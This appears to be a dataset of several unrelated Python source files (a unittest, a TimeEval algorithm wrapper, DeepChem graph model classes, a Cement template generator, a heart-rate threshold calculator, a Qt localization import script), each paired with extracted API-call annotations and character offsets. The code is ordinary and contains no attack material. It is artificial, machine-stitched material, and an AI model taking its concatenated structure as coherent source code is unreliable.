self.settings = self.settings.update(**kwargs)
| [
"notion.settings.Settings.from_file",
"notion.client.NotionClient"
]
| [((141, 161), 'notion.settings.Settings.from_file', 'Settings.from_file', ([], {}), '()\n', (159, 161), False, 'from notion.settings import Settings\n'), ((310, 367), 'notion.client.NotionClient', 'NotionClient', ([], {'token_v2': 'self.settings.token', 'monitor': '(False)'}), '(token_v2=self.settings.token, monitor=False)\n', (322, 367), False, 'from notion.client import NotionClient\n')] |
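Hypothetical usage of the Context class above; it assumes a valid token_v2 is already present in the on-disk Settings file, since get_client() validates the settings before connecting.
ctx = Context()
client = ctx.get_client()            # builds and caches the NotionClient on first call
assert client is ctx.get_client()    # later calls reuse the cached client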
import unittest
from Observers import Observer, ObserverMailServer, ObserverPbx
from Subjects import Subject, SubjectEflow
class UtVisitor(unittest.TestCase):
def test_observer(self):
# Create observers
pbx = ObserverPbx()
ms = ObserverMailServer()
# Create subject
subject = SubjectEflow()
subject.attach(pbx)
subject.attach(ms)
        # Notify observers when JB is on leave of absence
subject.notify("JB", "Hachi")
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"Observers.ObserverMailServer",
"Subjects.SubjectEflow",
"Observers.ObserverPbx"
]
| [((567, 582), 'unittest.main', 'unittest.main', ([], {}), '()\n', (580, 582), False, 'import unittest\n'), ((233, 246), 'Observers.ObserverPbx', 'ObserverPbx', ([], {}), '()\n', (244, 246), False, 'from Observers import Observer, ObserverMailServer, ObserverPbx\n'), ((260, 280), 'Observers.ObserverMailServer', 'ObserverMailServer', ([], {}), '()\n', (278, 280), False, 'from Observers import Observer, ObserverMailServer, ObserverPbx\n'), ((337, 351), 'Subjects.SubjectEflow', 'SubjectEflow', ([], {}), '()\n', (349, 351), False, 'from Subjects import Subject, SubjectEflow\n')] |
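The Observers and Subjects modules are not part of this sample; the sketch below is only a guess at minimal interfaces consistent with how the test drives them (attach plus a two-argument notify).
class Observer:
    def update(self, name, substitute):
        raise NotImplementedError
class ObserverPbx(Observer):
    def update(self, name, substitute):
        print("PBX: forward calls for", name, "to", substitute)
class SubjectEflow:
    def __init__(self):
        self._observers = []
    def attach(self, observer):
        self._observers.append(observer)
    def notify(self, name, substitute):
        for observer in self._observers:
            observer.update(name, substitute)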
from durations import Duration
from typing import Any, Dict, Optional
from timeeval import Algorithm, TrainingType, InputDimensionality
from timeeval.adapters import DockerAdapter
from timeeval.params import ParameterConfig
_eif_parameters: Dict[str, Dict[str, Any]] = {
"extension_level": {
"defaultValue": None,
"description": "Extension level 0 resembles standard isolation forest. If unspecified (`None`), then `extension_level=X.shape[1] - 1`.",
"name": "extension_level",
"type": "int"
},
"limit": {
"defaultValue": None,
"description": "The maximum allowed tree depth. This is by default set to average length of unsucessful search in a binary tree.",
"name": "limit",
"type": "int"
},
"max_samples": {
"defaultValue": None,
"description": "The number of samples to draw from X to train each base estimator: `max_samples * X.shape[0]`. If unspecified (`None`), then `max_samples=min(256, X.shape[0])`.",
"name": "max_samples",
"type": "float"
},
"n_trees": {
"defaultValue": 200,
"description": "The number of decision trees (base estimators) in the forest (ensemble).",
"name": "n_trees",
"type": "int"
},
"random_state": {
"defaultValue": 42,
"description": "Seed for random number generation.",
"name": "random_state",
"type": "int"
}
}
def eif(params: ParameterConfig = None, skip_pull: bool = False, timeout: Optional[Duration] = None) -> Algorithm:
return Algorithm(
name="Extended Isolation Forest (EIF)",
main=DockerAdapter(
image_name="registry.gitlab.hpi.de/akita/i/eif",
skip_pull=skip_pull,
timeout=timeout,
group_privileges="akita",
),
preprocess=None,
postprocess=None,
param_schema=_eif_parameters,
param_config=params or ParameterConfig.defaults(),
data_as_file=True,
training_type=TrainingType.UNSUPERVISED,
input_dimensionality=InputDimensionality("multivariate")
)
| [
"timeeval.adapters.DockerAdapter",
"timeeval.params.ParameterConfig.defaults",
"timeeval.InputDimensionality"
]
| [((1500, 1631), 'timeeval.adapters.DockerAdapter', 'DockerAdapter', ([], {'image_name': '"""registry.gitlab.hpi.de/akita/i/eif"""', 'skip_pull': 'skip_pull', 'timeout': 'timeout', 'group_privileges': '"""akita"""'}), "(image_name='registry.gitlab.hpi.de/akita/i/eif', skip_pull=\n skip_pull, timeout=timeout, group_privileges='akita')\n", (1513, 1631), False, 'from timeeval.adapters import DockerAdapter\n'), ((1940, 1975), 'timeeval.InputDimensionality', 'InputDimensionality', (['"""multivariate"""'], {}), "('multivariate')\n", (1959, 1975), False, 'from timeeval import Algorithm, TrainingType, InputDimensionality\n'), ((1807, 1833), 'timeeval.params.ParameterConfig.defaults', 'ParameterConfig.defaults', ([], {}), '()\n', (1831, 1833), False, 'from timeeval.params import ParameterConfig\n')] |
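An illustrative call of the eif() factory above with its default parameter configuration; the attribute reads assume Algorithm exposes the fields it is constructed with, as in TimeEval's Algorithm container.
algorithm = eif(skip_pull=True)     # default ParameterConfig, no Docker image pull
print(algorithm.name)               # "Extended Isolation Forest (EIF)"
print(algorithm.training_type)      # TrainingType.UNSUPERVISED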
"""
Convenience classes for assembling graph models.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import tensorflow as tf
from deepchem.nn.layers import GraphGather
from deepchem.models.tf_new_models.graph_topology import GraphTopology
class SequentialGraph(object):
"""An analog of Keras Sequential class for Graph data.
Like the Sequential class from Keras, but automatically passes topology
placeholders from GraphTopology to each graph layer (from layers) added
  to the network. Non-graph layers don't get the extra placeholders.
"""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of features per atom.
"""
self.graph = tf.Graph()
with self.graph.as_default():
self.graph_topology = GraphTopology(n_feat)
self.output = self.graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
def add(self, layer):
"""Adds a new layer to model."""
with self.graph.as_default():
############################################# DEBUG
#print("start - add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# For graphical layers, add connectivity placeholders
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
if (len(self.layers) > 0 and hasattr(self.layers[-1], "__name__")):
assert self.layers[-1].__name__ != "GraphGather", \
'Cannot use GraphConv or GraphGather layers after a GraphGather'
self.output = layer([self.output] +
self.graph_topology.get_topology_placeholders())
else:
self.output = layer(self.output)
############################################# DEBUG
#print("end- add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# Add layer to the layer list
self.layers.append(layer)
def get_graph_topology(self):
return self.graph_topology
def get_num_output_features(self):
"""Gets the output shape of the featurization layers of the network"""
return self.layers[-1].output_shape[1]
def return_outputs(self):
return self.output
def return_inputs(self):
return self.graph_topology.get_input_placeholders()
def get_layer(self, layer_id):
return self.layers[layer_id]
class SequentialSupportGraph(object):
"""An analog of Keras Sequential model for test/support models."""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of atomic features.
"""
self.graph = tf.Graph()
with self.graph.as_default():
# Create graph topology and x
self.test_graph_topology = GraphTopology(n_feat, name='test')
self.support_graph_topology = GraphTopology(n_feat, name='support')
self.test = self.test_graph_topology.get_atom_features_placeholder()
self.support = self.support_graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
# Whether or not we have used the GraphGather layer yet
self.bool_pre_gather = True
def add(self, layer):
"""Adds a layer to both test/support stacks.
Note that the layer transformation is performed independently on the
test/support tensors.
"""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
assert self.bool_pre_gather, "Cannot apply graphical layers after gather."
self.test = layer([self.test] + self.test_graph_topology.topology)
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.test = layer(self.test)
self.support = layer(self.support)
if type(layer).__name__ == 'GraphGather':
self.bool_pre_gather = False # Set flag to stop adding topology
def add_test(self, layer):
"""Adds a layer to test."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.test = layer([self.test] + self.test_graph_topology.topology)
else:
self.test = layer(self.test)
def add_support(self, layer):
"""Adds a layer to support."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.support = layer(self.support)
def join(self, layer):
"""Joins test and support to a two input two output layer"""
with self.graph.as_default():
self.layers.append(layer)
self.test, self.support = layer([self.test, self.support])
def get_test_output(self):
return self.test
def get_support_output(self):
return self.support
def return_outputs(self):
return [self.test] + [self.support]
def return_inputs(self):
return (self.test_graph_topology.get_inputs() +
self.support_graph_topology.get_inputs())
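# --- Illustrative sketch (editor's addition): how SequentialGraph dispatches layers. ---
# _IdentityLayer is a hypothetical stand-in; real models would add deepchem graph
# layers (GraphConv/GraphPool/GraphGather), whose constructor arguments are not
# shown here. Requires the TF1-era deepchem stack this module targets.
class _IdentityLayer(object):
  """Non-graph layer: receives only the atom-feature tensor, no topology."""

  def __call__(self, x):
    return x


def _sequential_graph_demo(n_feat=75):
  """Build a SequentialGraph and add a non-graph layer (75 is an example feature size)."""
  model = SequentialGraph(n_feat)
  # A non-graph layer goes through the plain `layer(self.output)` branch of add().
  model.add(_IdentityLayer())
  return model.return_outputs()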
| [
"tensorflow.Graph",
"deepchem.models.tf_new_models.graph_topology.GraphTopology"
]
| [((874, 884), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (882, 884), True, 'import tensorflow as tf\n'), ((2863, 2873), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2871, 2873), True, 'import tensorflow as tf\n'), ((947, 968), 'deepchem.models.tf_new_models.graph_topology.GraphTopology', 'GraphTopology', (['n_feat'], {}), '(n_feat)\n', (960, 968), False, 'from deepchem.models.tf_new_models.graph_topology import GraphTopology\n'), ((2977, 3011), 'deepchem.models.tf_new_models.graph_topology.GraphTopology', 'GraphTopology', (['n_feat'], {'name': '"""test"""'}), "(n_feat, name='test')\n", (2990, 3011), False, 'from deepchem.models.tf_new_models.graph_topology import GraphTopology\n'), ((3048, 3085), 'deepchem.models.tf_new_models.graph_topology.GraphTopology', 'GraphTopology', (['n_feat'], {'name': '"""support"""'}), "(n_feat, name='support')\n", (3061, 3085), False, 'from deepchem.models.tf_new_models.graph_topology import GraphTopology\n')] |
"""
Cement generate extension module.
"""
import re
import os
import inspect
import yaml
import shutil
from .. import Controller, minimal_logger, shell
from ..utils.version import VERSION, get_version
LOG = minimal_logger(__name__)
class GenerateTemplateAbstractBase(Controller):
class Meta:
pass
def _generate(self, source, dest):
msg = 'Generating %s %s in %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
data = {}
# builtin vars
maj_min = float('%s.%s' % (VERSION[0], VERSION[1]))
data['cement'] = {}
data['cement']['version'] = get_version()
data['cement']['major_version'] = VERSION[0]
data['cement']['minor_version'] = VERSION[1]
data['cement']['major_minor_version'] = maj_min
f = open(os.path.join(source, '.generate.yml'))
yaml_load = yaml.full_load if hasattr(yaml, 'full_load') else yaml.load
g_config = yaml_load(f)
f.close()
vars = g_config.get('variables', {})
exclude_list = g_config.get('exclude', [])
ignore_list = g_config.get('ignore', [])
# default ignore the .generate.yml config
g_config_yml = r'^(.*)[\/\\\\]%s[\/\\\\]\.generate\.yml$' % \
self._meta.label
ignore_list.append(g_config_yml)
var_defaults = {
'name': None,
'prompt': None,
'validate': None,
'case': None,
'default': None,
}
for defined_var in vars:
var = var_defaults.copy()
var.update(defined_var)
for key in ['name', 'prompt']:
assert var[key] is not None, \
"Required generate config key missing: %s" % key
val = None
if var['default'] is not None and self.app.pargs.defaults:
val = var['default']
elif var['default'] is not None:
default_text = ' [%s]' % var['default']
else:
default_text = '' # pragma: nocover
if val is None:
class MyPrompt(shell.Prompt):
class Meta:
text = "%s%s:" % (var['prompt'], default_text)
default = var.get('default', None)
p = MyPrompt()
val = p.prompt() # pragma: nocover
if var['case'] in ['lower', 'upper', 'title']:
val = getattr(val, var['case'])()
elif var['case'] is not None:
self.app.log.warning(
"Invalid configuration for variable " +
"'%s': " % var['name'] +
"case must be one of lower, upper, or title."
)
if var['validate'] is not None:
assert re.match(var['validate'], val), \
"Invalid Response (must match: '%s')" % var['validate']
data[var['name']] = val
try:
self.app.template.copy(source, dest, data,
force=self.app.pargs.force,
ignore=ignore_list,
exclude=exclude_list)
except AssertionError as e:
if re.match('(.*)already exists(.*)', e.args[0]):
raise AssertionError(e.args[0] + ' (try: --force)')
else:
raise # pragma: nocover
def _clone(self, source, dest):
msg = 'Cloning %s %s template to %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
if os.path.exists(dest) and self.app.pargs.force is True:
shutil.rmtree(dest)
elif os.path.exists(dest):
msg = "Destination path already exists: %s (try: --force)" % dest
raise AssertionError(msg)
shutil.copytree(source, dest)
def _default(self):
source = self._meta.source_path
dest = self.app.pargs.dest
if self.app.pargs.clone is True:
self._clone(source, dest)
else:
self._generate(source, dest)
def setup_template_items(app):
template_dirs = []
template_items = []
# look in app template dirs
for path in app._meta.template_dirs:
subpath = os.path.join(path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# use app template module, find it's path on filesystem
if app._meta.template_module is not None:
mod_parts = app._meta.template_module.split('.')
mod = mod_parts.pop()
try:
mod = app.__import__(mod, from_module='.'.join(mod_parts))
mod_path = os.path.dirname(inspect.getfile(mod))
subpath = os.path.join(mod_path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# FIXME: not exactly sure how to test for this so not covering
except AttributeError: # pragma: nocover
            msg = 'unable to load template module ' + \
                  '%s from %s' % (mod, '.'.join(mod_parts))  # pragma: nocover
app.log.debug(msg) # pragma: nocover
for path in template_dirs:
for item in os.listdir(path):
if item not in template_items:
template_items.append(item)
class GenerateTemplate(GenerateTemplateAbstractBase):
class Meta:
label = item
stacked_on = 'generate'
stacked_type = 'nested'
help = 'generate %s from template' % item
arguments = [
# ------------------------------------------------------
(['dest'],
{'help': 'destination directory path'}),
# ------------------------------------------------------
(['-f', '--force'],
{'help': 'force operation if destination exists',
'dest': 'force',
'action': 'store_true'}),
# ------------------------------------------------------
(['-D', '--defaults'],
{'help': 'use all default variable values',
'dest': 'defaults',
'action': 'store_true'}),
# ------------------------------------------------------
(['--clone'],
{'help': 'clone this template to destination path',
'dest': 'clone',
'action': 'store_true'}),
]
source_path = os.path.join(path, item)
app.handler.register(GenerateTemplate)
class Generate(Controller):
class Meta:
label = 'generate'
stacked_on = 'base'
stacked_type = 'nested'
config_section = 'generate'
def _setup(self, app):
super(Generate, self)._setup(app)
def _default(self):
self._parser.print_help()
def load(app):
app.handler.register(Generate)
app.hook.register('pre_run', setup_template_items)
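# --- Illustrative sketch (editor's addition): the `.generate.yml` structure that
# _generate() reads above (variables/exclude/ignore keys). The concrete label,
# prompt and regex values are made-up examples.
def _write_example_generate_config(path):
    config = {
        'ignore': [],
        'exclude': [r'^(.*)\.pyc$'],
        'variables': [
            {'name': 'app_label',
             'prompt': 'Application label',
             'validate': r'^[a-z][a-z0-9_]+$',
             'case': 'lower',
             'default': 'myapp'},
        ],
    }
    with open(path, 'w') as f:
        yaml.safe_dump(config, f, default_flow_style=False)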
| [
"os.path.exists",
"os.listdir",
"os.path.join",
"re.match",
"inspect.getfile",
"shutil.copytree",
"shutil.rmtree"
]
| [((3977, 4006), 'shutil.copytree', 'shutil.copytree', (['source', 'dest'], {}), '(source, dest)\n', (3992, 4006), False, 'import shutil\n'), ((4414, 4444), 'os.path.join', 'os.path.join', (['path', '"""generate"""'], {}), "(path, 'generate')\n", (4426, 4444), False, 'import os\n'), ((5491, 5507), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (5501, 5507), False, 'import os\n'), ((868, 905), 'os.path.join', 'os.path.join', (['source', '""".generate.yml"""'], {}), "(source, '.generate.yml')\n", (880, 905), False, 'import os\n'), ((3730, 3750), 'os.path.exists', 'os.path.exists', (['dest'], {}), '(dest)\n', (3744, 3750), False, 'import os\n'), ((3797, 3816), 'shutil.rmtree', 'shutil.rmtree', (['dest'], {}), '(dest)\n', (3810, 3816), False, 'import shutil\n'), ((3830, 3850), 'os.path.exists', 'os.path.exists', (['dest'], {}), '(dest)\n', (3844, 3850), False, 'import os\n'), ((4456, 4479), 'os.path.exists', 'os.path.exists', (['subpath'], {}), '(subpath)\n', (4470, 4479), False, 'import os\n'), ((4917, 4951), 'os.path.join', 'os.path.join', (['mod_path', '"""generate"""'], {}), "(mod_path, 'generate')\n", (4929, 4951), False, 'import os\n'), ((2904, 2934), 're.match', 're.match', (["var['validate']", 'val'], {}), "(var['validate'], val)\n", (2912, 2934), False, 'import re\n'), ((3346, 3391), 're.match', 're.match', (['"""(.*)already exists(.*)"""', 'e.args[0]'], {}), "('(.*)already exists(.*)', e.args[0])\n", (3354, 3391), False, 'import re\n'), ((4873, 4893), 'inspect.getfile', 'inspect.getfile', (['mod'], {}), '(mod)\n', (4888, 4893), False, 'import inspect\n'), ((4968, 4991), 'os.path.exists', 'os.path.exists', (['subpath'], {}), '(subpath)\n', (4982, 4991), False, 'import os\n'), ((7027, 7051), 'os.path.join', 'os.path.join', (['path', 'item'], {}), '(path, item)\n', (7039, 7051), False, 'import os\n')] |
from .gpxfile import get_hr_measurements
from .utils import interpolate
from operator import itemgetter
def __calculate_moving_sums(points, window):
""" Calculates hr moving sums of the window len """
time, hrs = zip(*points)
moving_sum = sum(hrs[0:window])
sums = [(time[0], moving_sum)]
for i, t in enumerate(time[1:-1 * window]):
moving_sum += hrs[i + window] - hrs[i]
sums.append((t, moving_sum))
return sums
def calculate_lactate_threshold(hrdata):
""" Given list of (time, hr), returns lactate threshold and selected data"""
test_period = 60 * 30 # test time
measured_period = 60 * 20 # measured period in seconds
hrs = interpolate(hrdata)
time_stamp, max_sum = max(__calculate_moving_sums(hrs, test_period),
key=itemgetter(1))
# your lactate threshold is average of last 20 in 30 minutes of tempo run
start_measure = time_stamp + (test_period - measured_period)
stop_measure = start_measure + measured_period
measured_time, measured_hrs = zip(*hrs[start_measure:stop_measure])
lactate_thr = round(sum(measured_hrs) / measured_period)
return (lactate_thr, measured_time, measured_hrs)
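# --- Illustrative sketch (editor's addition): feeding synthetic one-second samples
# into calculate_lactate_threshold. Real data would come from get_hr_measurements();
# this assumes interpolate() returns per-second (time, hr) tuples for already-dense
# input, and the steady 165 bpm series is an arbitrary example.
def _lactate_threshold_demo():
    hrdata = [(t, 165) for t in range(45 * 60)]  # 45 minutes at a flat 165 bpm
    lactate_thr, times, hrs = calculate_lactate_threshold(hrdata)
    return lactate_thr  # ~165 for this flat series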
| [
"operator.itemgetter"
]
| [((819, 832), 'operator.itemgetter', 'itemgetter', (['(1)'], {}), '(1)\n', (829, 832), False, 'from operator import itemgetter\n')] |
#! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import xml.etree.ElementTree as ET
import os
import sys
import shutil
import atexit
import subprocess
# Use the project root as the working directory
prevdir = os.getcwd()
workdir = os.path.join(os.path.dirname(__file__), '..', '..')
os.chdir(workdir)
atexit.register(os.chdir, prevdir)
# Include only locales above this threshold (e.g. 70%) in production
l10n_threshold = 0.70
parser = argparse.ArgumentParser()
parser.add_argument(
'-m', '--macos', default=False, action="store_true", dest="ismacos",
help='Include the MacOS bundle data')
parser.add_argument(
'-q', '--qt_path', default=None, dest="qtpath",
help='The QT binary path. If not set, we try to guess.')
args = parser.parse_args()
stepnum = 1
def title(text):
global stepnum
print(f"\033[96m\033[1mStep {stepnum}\033[0m: \033[97m{text}\033[0m")
stepnum = stepnum+1
# Step 0
title("Find the Qt localization tools...")
def qtquery(qmake, propname):
try:
qtquery = os.popen(f'{qmake} -query {propname}')
qtpath = qtquery.read().strip()
if len(qtpath) > 0:
return qtpath
finally:
pass
return None
qtbinpath = args.qtpath
if qtbinpath is None:
qtbinpath = qtquery('qmake', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake6', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake5', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake-qt5', 'QT_INSTALL_BINS')
if qtbinpath is None:
print('Unable to locate qmake tool.')
sys.exit(1)
if not os.path.isdir(qtbinpath):
print(f"QT path is not a diretory: {qtbinpath}")
sys.exit(1)
lupdate = os.path.join(qtbinpath, 'lupdate')
lconvert = os.path.join(qtbinpath, 'lconvert')
lrelease = os.path.join(qtbinpath, 'lrelease')
# Step 0
# Let's update the i18n repo
os.system(f"git submodule init")
os.system(f"git submodule update --remote --depth 1 i18n")
# Step 1
# Go through the i18n repo, check each XLIFF file and take
# note which locale is complete above the minimum threshold.
# Adds path of .xliff and .ts to l10n_files.
title("Validate the XLIFF file...")
l10n_files = []
for locale in os.listdir('i18n'):
# Skip non folders
if not os.path.isdir(os.path.join('i18n', locale)):
continue
# Skip hidden folders
if locale.startswith('.'):
continue
xliff_path = os.path.join('i18n', locale, 'mozillavpn.xliff')
# If it's the source locale (en), ignore parsing for completeness and
# add it to the list.
if locale == 'en':
print(f'OK\t- en added (reference locale)')
l10n_files.append({
'locale': 'en',
'ts': os.path.join('translations', 'generated', 'mozillavpn_en.ts'),
'xliff': xliff_path
})
continue
tree = ET.parse(xliff_path)
root = tree.getroot()
sources = 0
translations = 0
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}source'):
sources += 1
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}target'):
translations += 1
completeness = translations/(sources*1.0)
    # Ignore locales with less than 70% completeness
if completeness < l10n_threshold:
print(f'KO\t- {locale} is translated at {round(completeness*100, 2)}%, at least {l10n_threshold*100}% is needed')
continue # Not enough translations next file please
print(f'OK\t- {locale} added ({round(completeness*100, 2)}% translated)')
l10n_files.append({
'locale': locale,
'ts': os.path.join('translations', 'generated', f'mozillavpn_{locale}.ts'),
'xliff': xliff_path
})
# Step 2
title("Create folders and localization files for the languages...")
for file in l10n_files:
locdirectory = os.path.join('translations', 'generated', file['locale'])
os.makedirs(locdirectory, exist_ok=True)
locversion = os.path.join(locdirectory, f'locversion.plist')
with open(locversion, 'w') as locversion_file:
locversion_file.write(f"""<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>LprojCompatibleVersion</key>
<string>123</string>
<key>LprojLocale</key>
<string>{file['locale']}</string>
<key>LprojRevisionLevel</key>
<string>1</string>
<key>LprojVersion</key>
<string>123</string>
</dict>
</plist>""")
with open(os.path.join('translations', 'generated', 'macos.pri'), 'w') as macospri:
macospri.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
for file in l10n_files:
macospri.write(f"LANGUAGES_FILES_{file['locale']}.files += $$PWD/{file['locale']}/locversion.plist\n")
macospri.write(f"LANGUAGES_FILES_{file['locale']}.path = Contents/Resources/{file['locale']}.lproj\n")
macospri.write(f"QMAKE_BUNDLE_DATA += LANGUAGES_FILES_{file['locale']}\n\n")
# Step 3
title("Write resource file to import the locales that are ready...")
with open('translations/generated/translations.qrc', 'w') as qrcfile:
qrcfile.write('<!-- AUTOGENERATED! DO NOT EDIT!! -->\n')
qrcfile.write('<RCC>\n')
qrcfile.write(' <qresource prefix="/i18n">\n')
for file in l10n_files:
qrcfile.write(f' <file>mozillavpn_{file["locale"]}.qm</file>\n')
qrcfile.write(' </qresource>\n')
qrcfile.write('</RCC>\n')
# Step 4
title("Generate the Js/C++ string definitions...")
try:
subprocess.call([sys.executable, os.path.join('scripts', 'utils', 'generate_strings.py'),
'-o', os.path.join('translations', 'generated'),
os.path.join('translations', 'strings.yaml')])
except Exception as e:
print("generate_strings.py failed. Try with:\n\tpip3 install -r requirements.txt --user")
print(e)
exit(1)
# Build a dummy project to glob together everything that might contain strings.
title("Scanning for new strings...")
def scan_sources(projfile, dirpath):
projfile.write(f"HEADERS += $$files({dirpath}/*.h, true)\n")
projfile.write(f"SOURCES += $$files({dirpath}/*.cpp, true)\n")
projfile.write(f"RESOURCES += $$files({dirpath}/*.qrc, true)\n\n")
with open('translations/generated/dummy.pro', 'w') as dummyproj:
dummyproj.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
dummyproj.write(f"HEADERS += l18nstrings.h\n")
dummyproj.write(f"SOURCES += l18nstrings_p.cpp\n")
dummyproj.write(f"SOURCES += ../l18nstrings.cpp\n\n")
for l10n_file in l10n_files:
dummyproj.write(f"TRANSLATIONS += {os.path.basename(l10n_file['ts'])}\n")
dummyproj.write("\n")
scan_sources(dummyproj, '../../src')
scan_sources(dummyproj, '../../nebula')
# Step 5
title("Generate translation resources...")
for l10n_file in l10n_files:
os.system(f"{lconvert} -if xlf -i {l10n_file['xliff']} -o {l10n_file['ts']}")
os.system(f"{lupdate} translations/generated/dummy.pro")
for l10n_file in l10n_files:
os.system(f"{lrelease} -idbased {l10n_file['ts']}")
print(f'Imported {len(l10n_files)} locales')
git = os.popen(f'git submodule status i18n')
git_commit_hash = git.read().strip().replace("+","").split(' ')[0]
print(f'Current commit: https://github.com/mozilla-l10n/mozilla-vpn-client-l10n/commit/{git_commit_hash}')
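# --- Illustrative sketch (editor's addition): the completeness check used above,
# applied to an in-memory XLIFF snippet instead of a file. The two-unit document is a
# made-up example (one translated unit out of two -> 0.5 completeness).
def _xliff_completeness_demo():
    snippet = """<xliff xmlns="urn:oasis:names:tc:xliff:document:1.2" version="1.2">
      <file original="app" source-language="en" target-language="de" datatype="plaintext">
        <body>
          <trans-unit id="1"><source>Hello</source><target>Hallo</target></trans-unit>
          <trans-unit id="2"><source>World</source></trans-unit>
        </body>
      </file>
    </xliff>"""
    root = ET.fromstring(snippet)
    sources = len(list(root.iter('{urn:oasis:names:tc:xliff:document:1.2}source')))
    translations = len(list(root.iter('{urn:oasis:names:tc:xliff:document:1.2}target')))
    return translations / (sources * 1.0)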
| [
"os.listdir",
"xml.etree.ElementTree.parse",
"argparse.ArgumentParser",
"os.makedirs",
"os.path.join",
"os.getcwd",
"os.chdir",
"os.path.dirname",
"os.popen",
"os.path.isdir",
"os.path.basename",
"sys.exit",
"os.system",
"atexit.register"
]
| [((401, 412), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (410, 412), False, 'import os\n'), ((475, 492), 'os.chdir', 'os.chdir', (['workdir'], {}), '(workdir)\n', (483, 492), False, 'import os\n'), ((493, 527), 'atexit.register', 'atexit.register', (['os.chdir', 'prevdir'], {}), '(os.chdir, prevdir)\n', (508, 527), False, 'import atexit\n'), ((630, 655), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (653, 655), False, 'import argparse\n'), ((1905, 1939), 'os.path.join', 'os.path.join', (['qtbinpath', '"""lupdate"""'], {}), "(qtbinpath, 'lupdate')\n", (1917, 1939), False, 'import os\n'), ((1951, 1986), 'os.path.join', 'os.path.join', (['qtbinpath', '"""lconvert"""'], {}), "(qtbinpath, 'lconvert')\n", (1963, 1986), False, 'import os\n'), ((1998, 2033), 'os.path.join', 'os.path.join', (['qtbinpath', '"""lrelease"""'], {}), "(qtbinpath, 'lrelease')\n", (2010, 2033), False, 'import os\n'), ((2073, 2105), 'os.system', 'os.system', (['f"""git submodule init"""'], {}), "(f'git submodule init')\n", (2082, 2105), False, 'import os\n'), ((2106, 2164), 'os.system', 'os.system', (['f"""git submodule update --remote --depth 1 i18n"""'], {}), "(f'git submodule update --remote --depth 1 i18n')\n", (2115, 2164), False, 'import os\n'), ((2406, 2424), 'os.listdir', 'os.listdir', (['"""i18n"""'], {}), "('i18n')\n", (2416, 2424), False, 'import os\n'), ((7168, 7224), 'os.system', 'os.system', (['f"""{lupdate} translations/generated/dummy.pro"""'], {}), "(f'{lupdate} translations/generated/dummy.pro')\n", (7177, 7224), False, 'import os\n'), ((7363, 7401), 'os.popen', 'os.popen', (['f"""git submodule status i18n"""'], {}), "(f'git submodule status i18n')\n", (7371, 7401), False, 'import os\n'), ((436, 461), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (451, 461), False, 'import os\n'), ((1779, 1790), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1787, 1790), False, 'import sys\n'), ((1799, 1823), 'os.path.isdir', 'os.path.isdir', (['qtbinpath'], {}), '(qtbinpath)\n', (1812, 1823), False, 'import os\n'), ((1882, 1893), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1890, 1893), False, 'import sys\n'), ((2615, 2663), 'os.path.join', 'os.path.join', (['"""i18n"""', 'locale', '"""mozillavpn.xliff"""'], {}), "('i18n', locale, 'mozillavpn.xliff')\n", (2627, 2663), False, 'import os\n'), ((3049, 3069), 'xml.etree.ElementTree.parse', 'ET.parse', (['xliff_path'], {}), '(xliff_path)\n', (3057, 3069), True, 'import xml.etree.ElementTree as ET\n'), ((4033, 4090), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""', "file['locale']"], {}), "('translations', 'generated', file['locale'])\n", (4045, 4090), False, 'import os\n'), ((4095, 4135), 'os.makedirs', 'os.makedirs', (['locdirectory'], {'exist_ok': '(True)'}), '(locdirectory, exist_ok=True)\n', (4106, 4135), False, 'import os\n'), ((4153, 4200), 'os.path.join', 'os.path.join', (['locdirectory', 'f"""locversion.plist"""'], {}), "(locdirectory, f'locversion.plist')\n", (4165, 4200), False, 'import os\n'), ((7090, 7167), 'os.system', 